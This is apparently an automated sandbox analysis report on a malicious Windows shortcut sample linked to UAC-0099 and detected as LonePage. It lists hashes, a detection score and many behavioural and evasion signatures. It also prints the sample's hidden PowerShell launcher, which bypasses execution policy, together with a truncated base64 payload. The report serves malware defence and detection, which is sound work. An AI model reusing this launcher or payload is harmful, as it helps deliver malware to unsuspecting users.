Edit tour
Windows
Analysis Report
yv5ssYfoTG.lnk
Overview
General Information
Sample name: | yv5ssYfoTG.lnkrenamed because original name is a hash value |
Original sample name: | 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378.lnk |
Analysis ID: | 1522692 |
MD5: | c52b08ea962c2b3ca0ff41fe1ed5dbb3 |
SHA1: | 0b54ee5b102341e6d4c735382c052b6eb59c74dc |
SHA256: | 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378 |
Tags: | lnkUAC-0099user-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 6956 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -nop -noni -exec byp ass -c $te mp='UEsDBB QABgAIAAAA IQDfpNJsWg EAACAFAAAT AAgCW0Nvbn RlbnRfVHlw ZXNdLnhtbC CiBAIooAAC AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAC0lMtuwj AQRfeV+g+R t1Vi6KKqKg KLPpYtUukH GHsCVv2Sx7 z+vhMCUVUB kQpsIiUz99 4zVsaD0dqa bAkRtXcl6x c9loGTXmk3 K9nX5C1/ZB km4ZQw3kHJ NoBsNLy9GU w2ATAjtcOS zVMKT5yjnI MVWPgAjiqV j1Ykeo0zHo T8FjPg973e A5feJXApT7 UHGw5eoBIL k7LXNX1uSC IYZNlz01hn lUyEYLQUie p86dSflHyX UJBy24NzHf COGhg/mFBX jgfsdB90NF EryMYipndh qYuvfFRceb mwpCxO2xzg 9FWlJbT62i 1ELwGRztya oq1Yod2e/y gHpo0BvDxF 49sdDymR4B oAO+dOhBVM P69G8cu8E6 Si3ImYGrg8 RmvdCZFoA6 F59s/m2Nqc iqTOcfQBaa PjP8ber2yt zmngADHp03 9dm0jWZ88H 9W2gQB3I5t v7bfgDAAD/ /wMAUEsDBB QABgAIAAAA IQAekRq37w AAAE4CAAAL AAgCX3JlbH MvLnJlbHMg ogQCKKAAAg AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AArJLBasMw DEDvg/2D0b 1R2sEYo04v Y9DbGNkHCF tJTBPb2GrX /v082NgCXe lhR8vS05PQ enOcRnXglF 3wGpZVDYq9 Cdb5XsNb+7 x4AJWFvKUx eNZw4gyb5v Zm/cojSSnK g4tZFYrPGg aR+IiYzcAT 5SpE9uWnC2 kiKc/UYySz o55xVdf3mH 4zoJkx1dZq SFt7B6o9Rb 6GHbrOGX4K Zj+xlzMtkI /C3rJdxFTq k7gyjWop9S wabDAvJZyR YqwKGvC80e p6o7+nxYmF LAmhCYkv+3 xmXBJa/ueK 5hk/Nu8hWb Rf4W8bnF1B 8wEAAP//Aw BQSwMEFAAG AAgAAAAhAN Zks1H0AAAA MQMAABwACA F3b3JkL19y ZWxzL2RvY3 VtZW50Lnht bC5yZWxzIK IEASigAAEA